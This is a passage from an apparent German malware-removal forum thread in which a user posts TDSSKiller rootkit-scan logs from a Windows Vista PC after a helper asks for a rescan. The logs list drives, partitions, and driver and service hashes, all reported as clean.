14:27:00.0046 1440 [ F31EEBC1A1C81FD04005489CC3DCDFE7 ] C:\Windows\system32\basesrv.dll
14:27:00.0061 1440 [ D2293B069E4B63DC17B2F08D45E71124 ] C:\Windows\system32\winsrv.dll
14:27:00.0108 1440 [ D2293B069E4B63DC17B2F08D45E71124 ] C:\Windows\system32\winsrv.dll
14:27:00.0139 1440 [ D4E6D91C1349B7BFB3599A6ADA56851B ] C:\Windows\system32\services.exe
14:27:00.0139 1440 [Global] - ok
14:27:00.0139 1440 ================ Scan MBR ==================================
14:27:00.0155 1440 [ 5C616939100B85E558DA92B899A0FC36 ] \Device\Harddisk0\DR0
14:27:01.0301 1440 \Device\Harddisk0\DR0 - ok
14:27:01.0311 1440 [ 5FB38429D5D77768867C76DCBDB35194 ] \Device\Harddisk1\DR1
14:27:01.0321 1440 \Device\Harddisk1\DR1 - ok
14:27:01.0321 1440 [ 8F558EB6672622401DA993E1E865C861 ] \Device\Harddisk2\DR2
14:27:01.0331 1440 \Device\Harddisk2\DR2 - ok
14:27:01.0331 1440 ================ Scan VBR ==================================
14:27:01.0341 1440 [ 961EA6BC3F5CD34DA67B2EEE8AA84D1B ] \Device\Harddisk0\DR0\Partition1
14:27:01.0341 1440 \Device\Harddisk0\DR0\Partition1 - ok
14:27:01.0381 1440 [ 758AD88425527B05E4FA98631C162C08 ] \Device\Harddisk0\DR0\Partition2
14:27:01.0381 1440 \Device\Harddisk0\DR0\Partition2 - ok
14:27:01.0391 1440 [ EFF1ECE495ECBDEA78E34410A05FC2D3 ] \Device\Harddisk0\DR0\Partition3
14:27:01.0391 1440 \Device\Harddisk0\DR0\Partition3 - ok
14:27:01.0401 1440 [ D894F5CF2FC97000C4CD292863AEACC0 ] \Device\Harddisk1\DR1\Partition1
14:27:01.0401 1440 \Device\Harddisk1\DR1\Partition1 - ok
14:27:01.0411 1440 [ B40BC0A08101F64916E605AE52C91653 ] \Device\Harddisk2\DR2\Partition1
14:27:01.0411 1440 \Device\Harddisk2\DR2\Partition1 - ok
14:27:01.0411 1440 ============================================================
14:27:01.0411 1440 Scan finished
14:27:01.0411 1440 ============================================================
14:27:01.0431 3652 Detected object count: 0
14:27:01.0431 3652 Actual detected object count: 0
14:27:42.0124 4116 Deinitialize success

hi prüfe die Bilder der Anleitung noch mal, konfiguriere den TDSS killer und scanne erneut

Oh, das hatte ich übersehen. Es sind allerdings wieder keine Dateien gefunden worden. Hier die neue Logfile.

Zitat:

18:03:43.0871 5560 TDSS rootkit removing tool 2.8.16.0 Feb 11 2013 18:50:42
18:03:43.0965 5560 ============================================================
18:03:43.0965 5560 Current date / time: 2013/02/19 18:03:43.0965
18:03:43.0965 5560 SystemInfo:
18:03:43.0965 5560
18:03:43.0965 5560 OS Version: 6.0.6002 ServicePack: 2.0
18:03:43.0965 5560 Product type: Workstation
18:03:43.0966 5560 ComputerName: TUS-PC
18:03:43.0966 5560 UserName: TuS
18:03:43.0966 5560 Windows directory: C:\Windows
18:03:43.0966 5560 System windows directory: C:\Windows
18:03:43.0966 5560 Processor architecture: Intel x86
18:03:43.0966 5560 Number of processors: 2
18:03:43.0966 5560 Page size: 0x1000
18:03:43.0966 5560 Boot type: Normal boot
18:03:43.0966 5560 ============================================================
18:03:45.0317 5560 Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 (232.89 Gb), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
18:03:45.0319 5560 Drive \Device\Harddisk1\DR1 - Size: 0x7470C06000 (465.76 Gb), SectorSize: 0x200, Cylinders: 0xED81, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
18:03:45.0321 5560 Drive \Device\Harddisk2\DR2 - Size: 0x1D1C0F00000 (1863.01 Gb), SectorSize: 0x200, Cylinders: 0x3B601, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'W'
18:03:45.0322 5560 ============================================================
18:03:45.0322 5560 \Device\Harddisk0\DR0:
18:03:45.0323 5560 MBR partitions:
18:03:45.0323 5560 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x3F, BlocksNum 0x1BDC3FC1
18:03:45.0323 5560 \Device\Harddisk0\DR0\Partition2: MBR, Type 0xC, StartLBA 0x1BDC4000, BlocksNum 0x200800
18:03:45.0323 5560 \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0x1BFC4970, BlocksNum 0x1201000
18:03:45.0323 5560 \Device\Harddisk1\DR1:
18:03:45.0324 5560 MBR partitions:
18:03:45.0324 5560 \Device\Harddisk1\DR1\Partition1: MBR, Type 0xC, StartLBA 0x3F, BlocksNum 0x3A384C02
18:03:45.0324 5560 \Device\Harddisk2\DR2:
18:03:45.0324 5560 MBR partitions:
18:03:45.0324 5560 \Device\Harddisk2\DR2\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0xE8E07000
18:03:45.0324 5560 ============================================================
18:03:45.0338 5560 C: <-> \Device\Harddisk0\DR0\Partition1
18:03:45.0365 5560 D: <-> \Device\Harddisk0\DR0\Partition2
18:03:45.0432 5560 E: <-> \Device\Harddisk0\DR0\Partition3
18:03:45.0469 5560 G: <-> \Device\Harddisk2\DR2\Partition1
18:03:45.0469 5560 H: <-> \Device\Harddisk1\DR1\Partition1
18:03:45.0469 5560 ============================================================
18:03:45.0469 5560 Initialize success
18:03:45.0469 5560 ============================================================
18:03:55.0154 5696 ============================================================
18:03:55.0154 5696 Scan started
18:03:55.0154 5696 Mode: Manual; SigCheck; TDLFS;
18:03:55.0154 5696 ============================================================
18:03:56.0339 5696 ================ Scan system memory ========================
18:03:56.0339 5696 System memory - ok
18:03:56.0339 5696 ================ Scan services =============================
18:03:56.0620 5696 [ AEF9EE4451D5C46370142CB06D0F3591 ] Accelerometer C:\Windows\system32\DRIVERS\Accelerometer.sys
18:03:56.0729 5696 Accelerometer - ok
18:03:56.0760 5696 [ 82B296AE1892FE3DBEE00C9CF92F8AC7 ] ACPI C:\Windows\system32\drivers\acpi.sys
18:03:56.0776 5696 ACPI - ok
18:03:56.0806 5696 [ BF9DE454F80A1516D4D582520B2D6EDD ] ADIHdAudAddService C:\Windows\system32\drivers\ADIHdAud.sys
18:03:56.0996 5696 ADIHdAudAddService - ok
18:03:57.0086 5696 [ D19C4EE2AC7C47B8F5F84FFF1A789D8A ] AdobeARMservice C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
18:03:57.0106 5696 AdobeARMservice - ok
18:03:57.0206 5696 [ EC807244904FA170C299AB06D87FBDBE ] AdobeFlashPlayerUpdateSvc C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
18:03:57.0216 5696 AdobeFlashPlayerUpdateSvc - ok
18:03:57.0276 5696 [ 2EDC5BBAC6C651ECE337BDE8ED97C9FB ] adp94xx C:\Windows\system32\drivers\adp94xx.sys
18:03:57.0326 5696 adp94xx - ok
18:03:57.0376 5696 [ B84088CA3CDCA97DA44A984C6CE1CCAD ] adpahci C:\Windows\system32\drivers\adpahci.sys
18:03:57.0406 5696 adpahci - ok
18:03:57.0426 5696 [ 7880C67BCCC27C86FD05AA2AFB5EA469 ] adpu160m C:\Windows\system32\drivers\adpu160m.sys
18:03:57.0446 5696 adpu160m - ok
18:03:57.0456 5696 [ 9AE713F8E30EFC2ABCCD84904333DF4D ] adpu320 C:\Windows\system32\drivers\adpu320.sys
18:03:57.0486 5696 adpu320 - ok
18:03:57.0516 5696 [ 30EB9BCF0D1E4EDD3905AE003AC0C1AC ] AEADIFilters C:\Windows\system32\AEADISRV.EXE
18:03:57.0566 5696 AEADIFilters - ok
18:03:57.0596 5696 [ 9D1FDA9E086BA64E3C93C9DE32461BCF ] AeLookupSvc C:\Windows\System32\aelupsvc.dll
18:03:57.0696 5696 AeLookupSvc - ok
18:03:57.0766 5696 [ 3911B972B55FEA0478476B2E777B29FA ] AFD C:\Windows\system32\drivers\afd.sys
18:03:57.0876 5696 AFD - ok
18:03:57.0936 5696 [ 9C9D3B7A05445B1AB2DF4D0C4D6B77E8 ] AgereModemAudio C:\Program Files\LSI SoftModem\agrsmsvc.exe
18:03:57.0986 5696 AgereModemAudio - ok
18:03:58.0036 5696 [ 3712986CC3ABF0DC656B43525B9D1279 ] AgereSoftModem C:\Windows\system32\DRIVERS\AGRSM.sys
18:03:58.0176 5696 AgereSoftModem - ok
18:03:58.0236 5696 [ EF23439CDD587F64C2C1B8825CEAD7D8 ] agp440 C:\Windows\system32\drivers\agp440.sys
18:03:58.0266 5696 agp440 - ok
18:03:58.0346 5696 [ AE1FDF7BF7BB6C6A70F67699D880592A ] aic78xx C:\Windows\system32\drivers\djsvs.sys
18:03:58.0366 5696 aic78xx - ok
18:03:58.0386 5696 [ A1545B731579895D8CC44FC0481C1192 ] ALG C:\Windows\System32\alg.exe
18:03:58.0516 5696 ALG - ok
18:03:58.0536 5696 [ 90395B64600EBB4552E26E178C94B2E4 ] aliide C:\Windows\system32\drivers\aliide.sys
18:03:58.0556 5696 aliide - ok
18:03:58.0596 5696 [ 2B13E304C9DFDFA5EB582F6A149FA2C7 ] amdagp C:\Windows\system32\drivers\amdagp.sys
18:03:58.0616 5696 amdagp - ok
18:03:58.0636 5696 [ 0577DF1D323FE75A739C787893D300EA ] amdide C:\Windows\system32\drivers\amdide.sys
18:03:58.0666 5696 amdide - ok
18:03:58.0696 5696 [ DC487885BCEF9F28EECE6FAC0E5DDFC5 ] AmdK7 C:\Windows\system32\drivers\amdk7.sys
18:03:58.0935 5696 AmdK7 - ok
18:03:58.0966 5696 [ 0CA0071DA4315B00FC1328CA86B425DA ] AmdK8 C:\Windows\system32\drivers\amdk8.sys
18:03:59.0029 5696 AmdK8 - ok
18:03:59.0091 5696 [ 466A0D95960DAD3222C896D2CEA99993 ] AntiVirSchedulerService C:\Program Files\Avira\AntiVir Desktop\sched.exe
18:03:59.0138 5696 AntiVirSchedulerService - ok
18:03:59.0169 5696 [ A489BE6BB0AA1FF406B488B60542314B ] AntiVirService C:\Program Files\Avira\AntiVir Desktop\avguard.exe
18:03:59.0185 5696 AntiVirService - ok
18:03:59.0226 5696 [ C6D704C7F0434DC791AAC37CAC4B6E14 ] Appinfo C:\Windows\System32\appinfo.dll
18:03:59.0276 5696 Appinfo - ok
18:03:59.0356 5696 [ F401929EE0CC92BFE7F15161CA535383 ] Apple Mobile Device C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
18:03:59.0366 5696 Apple Mobile Device - ok
18:03:59.0406 5696 [ 5F673180268BB1FDB69C99B6619FE379 ] arc C:\Windows\system32\drivers\arc.sys
18:03:59.0436 5696 arc - ok
18:03:59.0466 5696 [ 957F7540B5E7F602E44648C7DE5A1C05 ] arcsas C:\Windows\system32\drivers\arcsas.sys
18:03:59.0496 5696 arcsas - ok
18:03:59.0536 5696 [ 53B202ABEE6455406254444303E87BE1 ] AsyncMac C:\Windows\system32\DRIVERS\asyncmac.sys
18:03:59.0596 5696 AsyncMac - ok
18:03:59.0626 5696 [ 1F05B78AB91C9075565A9D8A4B880BC4 ] atapi C:\Windows\system32\drivers\atapi.sys
18:03:59.0636 5696 atapi - ok
18:03:59.0666 5696 [ 68E2A1A0407A66CF50DA0300852424AB ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
18:03:59.0697 5696 AudioEndpointBuilder - ok
18:03:59.0705 5696 [ 68E2A1A0407A66CF50DA0300852424AB ] Audiosrv C:\Windows\System32\Audiosrv.dll
18:03:59.0729 5696 Audiosrv - ok
18:03:59.0762 5696 [ D5541F0AFB767E85FC412FC609D96A74 ] avgntflt C:\Windows\system32\DRIVERS\avgntflt.sys
18:03:59.0794 5696 avgntflt - ok
18:03:59.0821 5696 [ 7D967A682D4694DF7FA57D63A2DB01FE ] avipbb C:\Windows\system32\DRIVERS\avipbb.sys
18:03:59.0859 5696 avipbb - ok
18:03:59.0877 5696 [ 271CFD1A989209B1964E24D969552BF7 ] avkmgr C:\Windows\system32\DRIVERS\avkmgr.sys
18:03:59.0906 5696 avkmgr - ok
18:03:59.0939 5696 [ 0A5E8178EFF1D8F109A95235AEB7D76F ] azvusb C:\Windows\system32\DRIVERS\azvusb.sys
18:03:59.0983 5696 azvusb - ok
18:04:00.0081 5696 [ 67E506B75BD5326A3EC7B70BD014DFB6 ] Beep C:\Windows\system32\drivers\Beep.sys
18:04:00.0114 5696 Beep - ok
18:04:00.0159 5696 [ C789AF0F724FDA5852FB9A7D3A432381 ] BFE C:\Windows\System32\bfe.dll
18:04:00.0219 5696 BFE - ok
18:04:00.0277 5696 [ 93952506C6D67330367F7E7934B6A02F ] BITS C:\Windows\System32\qmgr.dll
18:04:00.0338 5696 BITS - ok
18:04:00.0343 5696 blbdrive - ok
18:04:00.0413 5696 [ DB5BEA73EDAF19AC68B2C0FAD0F92B1A ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
18:04:00.0450 5696 Bonjour Service - ok
18:04:00.0497 5696 [ 35F376253F687BDE63976CCB3F2108CA ] bowser C:\Windows\system32\DRIVERS\bowser.sys
18:04:00.0571 5696 bowser - ok
18:04:00.0623 5696 [ 9F9ACC7F7CCDE8A15C282D3F88B43309 ] BrFiltLo C:\Windows\system32\drivers\brfiltlo.sys
18:04:00.0682 5696 BrFiltLo - ok
18:04:00.0706 5696 [ 56801AD62213A41F6497F96DEE83755A ] BrFiltUp C:\Windows\system32\drivers\brfiltup.sys
18:04:00.0776 5696 BrFiltUp - ok
18:04:00.0806 5696 [ A3629A0C4226F9E9C72FAAEEBC3AD33C ] Browser C:\Windows\System32\browser.dll
18:04:00.0858 5696 Browser - ok
18:04:00.0872 5696 [ B304E75CFF293029EDDF094246747113 ] Brserid C:\Windows\system32\drivers\brserid.sys
18:04:00.0937 5696 Brserid - ok
18:04:00.0950 5696 [ 203F0B1E73ADADBBB7B7B1FABD901F6B ] BrSerWdm C:\Windows\system32\drivers\brserwdm.sys
18:04:01.0035 5696 BrSerWdm - ok
18:04:01.0064 5696 [ BD456606156BA17E60A04E18016AE54B ] BrUsbMdm C:\Windows\system32\drivers\brusbmdm.sys
18:04:01.0140 5696 BrUsbMdm - ok
18:04:01.0166 5696 [ AF72ED54503F717A43268B3CC5FAEC2E ] BrUsbSer C:\Windows\system32\drivers\brusbser.sys
18:04:01.0260 5696 BrUsbSer - ok
18:04:01.0295 5696 [ 6D39C954799B63BA866910234CF7D726 ] BthEnum C:\Windows\system32\DRIVERS\BthEnum.sys
18:04:01.0372 5696 BthEnum - ok
18:04:01.0406 5696 [ AD07C1EC6665B8B35741AB91200C6B68 ] BTHMODEM C:\Windows\system32\drivers\bthmodem.sys
18:04:01.0527 5696 BTHMODEM - ok
18:04:01.0586 5696 [ 5904EFA25F829BF84EA6FB045134A1D8 ] BthPan C:\Windows\system32\DRIVERS\bthpan.sys
18:04:01.0633 5696 BthPan - ok
18:04:01.0664 5696 [ 611FF3F2F095C8D4A6D4CFD9DCC09793 ] BTHPORT C:\Windows\system32\Drivers\BTHport.sys
18:04:01.0758 5696 BTHPORT - ok
18:04:01.0820 5696 [ A4C8377FA4A994E07075107DBE2E3DCE ] BthServ C:\Windows\System32\bthserv.dll
18:04:01.0867 5696 BthServ - ok
18:04:01.0883 5696 [ D330803EAB2A15CAEC7F011F1D4CB30E ] BTHUSB C:\Windows\system32\Drivers\BTHUSB.sys
18:04:01.0914 5696 BTHUSB - ok
18:04:01.0961 5696 [ 7ADD03E75BEB9E6DD102C3081D29840A ] cdfs C:\Windows\system32\DRIVERS\cdfs.sys
18:04:02.0007 5696 cdfs - ok
18:04:02.0054 5696 [ 6B4BFFB9BECD728097024276430DB314 ] cdrom C:\Windows\system32\DRIVERS\cdrom.sys
18:04:02.0101 5696 cdrom - ok
18:04:02.0148 5696 [ 312EC3E37A0A1F2006534913E37B4423 ] CertPropSvc C:\Windows\System32\certprop.dll
18:04:02.0195 5696 CertPropSvc - ok
18:04:02.0226 5696 [ DA8E0AFC7BAA226C538EF53AC2F90897 ] circlass C:\Windows\system32\drivers\circlass.sys
18:04:02.0273 5696 circlass - ok
18:04:02.0319 5696 [ D7659D3B5B92C31E84E53C1431F35132 ] CLFS C:\Windows\system32\CLFS.sys
18:04:02.0335 5696 CLFS - ok
18:04:02.0382 5696 [ 8EE772032E2FE80A924F3B8DD5082194 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
18:04:02.0397 5696 clr_optimization_v2.0.50727_32 - ok
18:04:02.0453 5696 [ C5A75EB48E2344ABDC162BDA79E16841 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
18:04:02.0493 5696 clr_optimization_v4.0.30319_32 - ok
18:04:02.0523 5696 [ 99AFC3795B58CC478FBBBCDC658FCB56 ] CmBatt C:\Windows\system32\DRIVERS\CmBatt.sys
18:04:02.0593 5696 CmBatt - ok
18:04:02.0623 5696 [ 45201046C776FFDAF3FC8A0029C581C8 ] cmdide C:\Windows\system32\drivers\cmdide.sys
18:04:02.0643 5696 cmdide - ok
18:04:02.0653 5696 [ 6AFEF0B60FA25DE07C0968983EE4F60A ] Compbatt C:\Windows\system32\DRIVERS\compbatt.sys
18:04:02.0673 5696 Compbatt - ok
18:04:02.0683 5696 COMSysApp - ok
18:04:02.0683 5696 [ 2A213AE086BBEC5E937553C7D9A2B22C ] crcdisk C:\Windows\system32\drivers\crcdisk.sys
18:04:02.0703 5696 crcdisk - ok
18:04:02.0723 5696 [ 22A7F883508176489F559EE745B5BF5D ] Crusoe C:\Windows\system32\drivers\crusoe.sys
18:04:02.0793 5696 Crusoe - ok
18:04:02.0833 5696 [ F1E8C34892336D33EDDCDFE44E474F64 ] CryptSvc C:\Windows\system32\cryptsvc.dll
18:04:02.0873 5696 CryptSvc - ok
18:04:02.0923 5696 [ 3B5B4D53FEC14F7476CA29A20CC31AC9 ] DcomLaunch C:\Windows\system32\rpcss.dll
18:04:02.0973 5696 DcomLaunch - ok
18:04:03.0023 5696 [ 622C41A07CA7E6DD91770F50D532CB6C ] DfsC C:\Windows\system32\Drivers\dfsc.sys
18:04:03.0073 5696 DfsC - ok
18:04:03.0193 5696 [ 2CC3DCFB533A1035B13DCAB6160AB38B ] DFSR C:\Windows\system32\DFSR.exe
18:04:03.0383 5696 DFSR - ok
18:04:03.0443 5696 [ 9028559C132146FB75EB7ACF384B086A ] Dhcp C:\Windows\System32\dhcpcsvc.dll
18:04:03.0483 5696 Dhcp - ok
18:04:03.0513 5696 [ 5D4AEFC3386920236A548271F8F1AF6A ] disk C:\Windows\system32\drivers\disk.sys
18:04:03.0543 5696 disk - ok
18:04:03.0573 5696 [ 57D762F6F5974AF0DA2BE88A3349BAAA ] Dnscache C:\Windows\System32\dnsrslvr.dll
18:04:03.0643 5696 Dnscache - ok
18:04:03.0673 5696 [ 324FD74686B1EF5E7C19A8AF49E748F6 ] dot3svc C:\Windows\System32\dot3svc.dll
18:04:03.0710 5696 dot3svc - ok
18:04:03.0762 5696 [ A622E888F8AA2F6B49E9BC466F0E5DEF ] DPS C:\Windows\system32\dps.dll
18:04:03.0805 5696 DPS - ok
18:04:03.0850 5696 [ 97FEF831AB90BEE128C9AF390E243F80 ] drmkaud C:\Windows\system32\drivers\drmkaud.sys
18:04:03.0894 5696 drmkaud - ok
18:04:03.0926 5696 [ C68AC676B0EF30CFBB1080ADCE49EB1F ] DXGKrnl C:\Windows\System32\drivers\dxgkrnl.sys
18:04:03.0960 5696 DXGKrnl - ok
18:04:03.0987 5696 [ F88FB26547FD2CE6D0A5AF2985892C48 ] E1G60 C:\Windows\system32\DRIVERS\E1G60I32.sys
18:04:04.0070 5696 E1G60 - ok
18:04:04.0101 5696 [ C0B95E40D85CD807D614E264248A45B9 ] EapHost C:\Windows\System32\eapsvc.dll
18:04:04.0139 5696 EapHost - ok
18:04:04.0189 5696 [ 7F64EA048DCFAC7ACF8B4D7B4E6FE371 ] Ecache C:\Windows\system32\drivers\ecache.sys
18:04:04.0217 5696 Ecache - ok
18:04:04.0245 5696 [ E8F3F21A71720C84BCF423B80028359F ] elxstor C:\Windows\system32\drivers\elxstor.sys
18:04:04.0285 5696 elxstor - ok
18:04:04.0324 5696 [ 4E6B23DFC917EA39306B529B773950F4 ] EMDMgmt C:\Windows\system32\emdmgmt.dll
18:04:04.0397 5696 EMDMgmt - ok
18:04:04.0432 5696 [ 67058C46504BC12D821F38CF99B7B28F ] EventSystem C:\Windows\system32\es.dll
18:04:04.0502 5696 EventSystem - ok
18:04:04.0549 5696 [ 22B408651F9123527BCEE54B4F6C5CAE ] exfat C:\Windows\system32\drivers\exfat.sys
18:04:04.0596 5696 exfat - ok
18:04:04.0643 5696 [ 1E9B9A70D332103C52995E957DC09EF8 ] fastfat C:\Windows\system32\drivers\fastfat.sys
18:04:04.0705 5696 fastfat - ok
18:04:04.0767 5696 [ 63BDADA84951B9C03E641800E176898A ] fdc C:\Windows\system32\DRIVERS\fdc.sys
18:04:04.0814 5696 fdc - ok
18:04:04.0845 5696 [ 6629B5F0E98151F4AFDD87567EA32BA3 ] fdPHost C:\Windows\system32\fdPHost.dll
18:04:04.0877 5696 fdPHost - ok
18:04:04.0908 5696 [ 89ED56DCE8E47AF40892778A5BD31FD2 ] FDResPub C:\Windows\system32\fdrespub.dll
18:04:04.0939 5696 FDResPub - ok
18:04:04.0970 5696 [ A8C0139A884861E3AAE9CFE73B208A9F ] FileInfo C:\Windows\system32\drivers\fileinfo.sys
18:04:04.0986 5696 FileInfo - ok
18:04:05.0017 5696 [ 0AE429A696AECBC5970E3CF2C62635AE ] Filetrace C:\Windows\system32\drivers\filetrace.sys
18:04:05.0058 5696 Filetrace - ok
18:04:05.0088 5696 [ 6603957EFF5EC62D25075EA8AC27DE68 ] flpydisk C:\Windows\system32\DRIVERS\flpydisk.sys
18:04:05.0158 5696 flpydisk - ok
18:04:05.0188 5696 [ 01334F9EA68E6877C4EF05D3EA8ABB05 ] FltMgr C:\Windows\system32\drivers\fltmgr.sys
18:04:05.0218 5696 FltMgr - ok
18:04:05.0278 5696 [ 8CE364388C8ECA59B14B539179276D44 ] FontCache C:\Windows\system32\FntCache.dll
18:04:05.0348 5696 FontCache - ok
18:04:05.0438 5696 [ C7FBDD1ED42F82BFA35167A5C9803EA3 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
18:04:05.0458 5696 FontCache3.0.0.0 - ok
18:04:05.0478 5696 [ B972A66758577E0BFD1DE0F91AAA27B5 ] Fs_Rec C:\Windows\system32\drivers\Fs_Rec.sys
18:04:05.0548 5696 Fs_Rec - ok
18:04:05.0568 5696 [ 4E1CD0A45C50A8882616CAE5BF82F3C5 ] gagp30kx C:\Windows\system32\drivers\gagp30kx.sys
18:04:05.0588 5696 gagp30kx - ok
18:04:05.0638 5696 [ 8182FF89C65E4D38B2DE4BB0FB18564E ] GEARAspiWDM C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
18:04:05.0658 5696 GEARAspiWDM - ok
18:04:05.0708 5696 [ CD5D0AEEE35DFD4E986A5AA1500A6E66 ] gpsvc C:\Windows\System32\gpsvc.dll
18:04:05.0778 5696 gpsvc - ok
18:04:05.0828 5696 [ 88A78635B41ED4B261365FADEB28FE81 ] HBtnKey C:\Windows\system32\DRIVERS\cpqbttn.sys
18:04:05.0858 5696 HBtnKey - ok
18:04:05.0898 5696 [ CB04C744BE0A61B1D648FAED182C3B59 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
18:04:05.0978 5696 HdAudAddService - ok
18:04:06.0008 5696 [ 062452B7FFD68C8C042A6261FE8DFF4A ] HDAudBus C:\Windows\system32\DRIVERS\HDAudBus.sys
18:04:06.0058 5696 HDAudBus - ok
18:04:06.0098 5696 [ 1338520E78D90154ED6BE8F84DE5FCEB ] HidBth C:\Windows\system32\drivers\hidbth.sys
18:04:06.0158 5696 HidBth - ok
18:04:06.0178 5696 [ FF3160C3A2445128C5A6D9B076DA519E ] HidIr C:\Windows\system32\drivers\hidir.sys
18:04:06.0228 5696 HidIr - ok
18:04:06.0258 5696 [ 84067081F3318162797385E11A8F0582 ] hidserv C:\Windows\system32\hidserv.dll
18:04:06.0288 5696 hidserv - ok
18:04:06.0338 5696 [ CCA4B519B17E23A00B826C55716809CC ] HidUsb C:\Windows\system32\DRIVERS\hidusb.sys
18:04:06.0388 5696 HidUsb - ok
18:04:06.0408 5696 [ D8AD255B37DA92434C26E4876DB7D418 ] hkmsvc C:\Windows\system32\kmsvc.dll
18:04:06.0458 5696 hkmsvc - ok
18:04:06.0478 5696 [ DF353B401001246853763C4B7AAA6F50 ] HpCISSs C:\Windows\system32\drivers\hpcisss.sys
18:04:06.0498 5696 HpCISSs - ok
18:04:06.0528 5696 [ 64637B65C90DF48C94BB9346AFB3AC61 ] hpdskflt C:\Windows\system32\DRIVERS\hpdskflt.sys
18:04:06.0548 5696 hpdskflt - ok
18:04:06.0608 5696 [ FDF273A845F1FFCCEADF363AAF47582F ] hpqwmiex C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
18:04:06.0628 5696 hpqwmiex - ok
18:04:06.0638 5696 [ DB8CF923DFD8DD336BEA7F439A627858 ] hpsrv C:\Windows\system32\Hpservice.exe
18:04:06.0648 5696 hpsrv - ok
18:04:06.0678 5696 [ 0EEECA26C8D4BDE2A4664DB058A81937 ] HTTP C:\Windows\system32\drivers\HTTP.sys
18:04:06.0735 5696 HTTP - ok
18:04:06.0746 5696 hwdatacard - ok
18:04:06.0770 5696 [ 324C2152FF2C61ABAE92D09F3CCA4D63 ] i2omp C:\Windows\system32\drivers\i2omp.sys
18:04:06.0787 5696 i2omp - ok
18:04:06.0829 5696 [ 22D56C8184586B7A1F6FA60BE5F5A2BD ] i8042prt C:\Windows\system32\DRIVERS\i8042prt.sys
18:04:06.0871 5696 i8042prt - ok
18:04:06.0910 5696 [ C957BF4B5D80B46C5017BF0101E6C906 ] iaStorV C:\Windows\system32\drivers\iastorv.sys
18:04:06.0936 5696 iaStorV - ok
18:04:07.0005 5696 [ 98477B08E61945F974ED9FDC4CB6BDAB ] idsvc C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
18:04:07.0088 5696 idsvc - ok
18:04:07.0170 5696 [ 0391268713612372E4E0ECEAADAD41D5 ] igfx C:\Windows\system32\DRIVERS\igdkmd32.sys
18:04:07.0334 5696 igfx - ok
18:04:07.0356 5696 [ 2D077BF86E843F901D8DB709C95B49A5 ] iirsp C:\Windows\system32\drivers\iirsp.sys
18:04:07.0379 5696 iirsp - ok
18:04:07.0421 5696 [ 9908D8A397B76CD8D31D0D383C5773C9 ] IKEEXT C:\Windows\System32\ikeext.dll
18:04:07.0496 5696 IKEEXT - ok
18:04:07.0522 5696 [ 97469037714070E45194ED318D636401 ] intelide C:\Windows\system32\drivers\intelide.sys
18:04:07.0543 5696 intelide - ok
18:04:07.0566 5696 [ 224191001E78C89DFA78924C3EA595FF ] intelppm C:\Windows\system32\DRIVERS\intelppm.sys
18:04:07.0629 5696 intelppm - ok
18:04:07.0700 5696 [ 9AC218C6E6105477484C6FDBE7D409A4 ] IPBusEnum C:\Windows\system32\ipbusenum.dll
18:04:07.0762 5696 IPBusEnum - ok
18:04:07.0809 5696 [ 62C265C38769B864CB25B4BCF62DF6C3 ] IpFilterDriver C:\Windows\system32\DRIVERS\ipfltdrv.sys
18:04:07.0856 5696 IpFilterDriver - ok
18:04:07.0887 5696 [ 1998BD97F950680BB55F55A7244679C2 ] iphlpsvc C:\Windows\System32\iphlpsvc.dll
18:04:07.0949 5696 iphlpsvc - ok
18:04:07.0949 5696 IpInIp - ok
18:04:07.0980 5696 [ 40F34F8ABA2A015D780E4B09138B6C17 ] IPMIDRV C:\Windows\system32\drivers\ipmidrv.sys
18:04:08.0043 5696 IPMIDRV - ok
18:04:08.0074 5696 [ 8793643A67B42CEC66490B2A0CF92D68 ] IPNAT C:\Windows\system32\DRIVERS\ipnat.sys
18:04:08.0121 5696 IPNAT - ok
18:04:08.0183 5696 [ E6BE7A41A28D8F2DB174957454D32448 ] iPod Service C:\Program Files\iPod\bin\iPodService.exe
18:04:08.0324 5696 iPod Service - ok
18:04:08.0394 5696 [ 109C0DFB82C3632FBD11949B73AEEAC9 ] IRENUM C:\Windows\system32\drivers\irenum.sys
18:04:08.0454 5696 IRENUM - ok
18:04:08.0494 5696 [ 350FCA7E73CF65BCEF43FAE1E4E91293 ] isapnp C:\Windows\system32\drivers\isapnp.sys
18:04:08.0514 5696 isapnp - ok
18:04:08.0544 5696 [ 232FA340531D940AAC623B121A595034 ] iScsiPrt C:\Windows\system32\DRIVERS\msiscsi.sys
18:04:08.0564 5696 iScsiPrt - ok
18:04:08.0584 5696 [ BCED60D16156E428F8DF8CF27B0DF150 ] iteatapi C:\Windows\system32\drivers\iteatapi.sys
18:04:08.0614 5696 iteatapi - ok
18:04:08.0634 5696 [ 06FA654504A498C30ADCA8BEC4E87E7E ] iteraid C:\Windows\system32\drivers\iteraid.sys
18:04:08.0654 5696 iteraid - ok
18:04:08.0684 5696 [ 37605E0A8CF00CBBA538E753E4344C6E ] kbdclass C:\Windows\system32\DRIVERS\kbdclass.sys
18:04:08.0704 5696 kbdclass - ok
18:04:08.0744 5696 [ EDE59EC70E25C24581ADD1FBEC7325F7 ] kbdhid C:\Windows\system32\DRIVERS\kbdhid.sys
18:04:08.0804 5696 kbdhid - ok
18:04:08.0834 5696 [ A3E186B4B935905B829219502557314E ] KeyIso C:\Windows\system32\lsass.exe
